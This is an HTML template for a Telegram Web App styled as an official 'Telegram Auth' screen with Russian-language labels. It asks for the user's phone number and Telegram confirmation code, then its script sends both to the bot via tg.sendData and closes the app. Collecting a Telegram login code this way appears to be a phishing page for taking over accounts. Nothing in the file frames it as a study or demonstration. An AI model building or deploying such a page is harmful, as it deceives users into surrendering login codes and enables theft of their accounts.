<!-- templates/webapp/auth.html -->
<!DOCTYPE html>
<html>
<head>
    <title>Telegram Auth</title>
    <script src="https://telegram.org/js/telegram-web-app.js"></script>
    <style>
        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
            padding: 20px;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            min-height: 100vh;
            color: white;
        }
        .container {
            max-width: 400px;
            margin: 0 auto;
        }
        .card {
            background: white;
            border-radius: 15px;
            padding: 30px;
            color: #333;
            box-shadow: 0 10px 30px rgba(0,0,0,0.3);
        }
        .btn-primary {
            background: #007bff;
            border: none;
            padding: 12px 20px;
            border-radius: 8px;
            width: 100%;
            font-size: 16px;
            margin-top: 20px;
        }
        .form-control {
            border-radius: 8px;
            padding: 12px;
            border: 2px solid #e9ecef;
            margin-bottom: 15px;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="card">
            <h3 class="text-center mb-4">🔐 Авторизация Telegram</h3>

            <form id="authForm">
                <div class="mb-3">
                    <label class="form-label">Номер телефона</label>
                    <input type="tel" class="form-control" id="phone" placeholder="+79123456789" required>
                </div>

                <div class="mb-3">
                    <label class="form-label">Код подтверждения</label>
                    <input type="text" class="form-control" id="code" placeholder="12345" required>
                </div>

                <button type="submit" class="btn btn-primary">
                    📱 Авторизоваться
                </button>
            </form>
        </div>
    </div>

    <script>
        const tg = window.Telegram.WebApp;
        tg.expand();
        tg.BackButton.hide();

        document.getElementById('authForm').addEventListener('submit', function(e) {
            e.preventDefault();

            const phone = document.getElementById('phone').value;
            const code = document.getElementById('code').value;

            // Имитация данных сессии
            const sessionData = JSON.stringify({
                phone_number: phone,
                code: code,
                timestamp: new Date().toISOString()
            });

            // Отправляем данные обратно в бота
            tg.sendData(JSON.stringify({
                phone_number: phone,
                session_data: sessionData
            }));

            // Закрываем WebApp
            tg.close();
        });
    </script>
</body>
</html>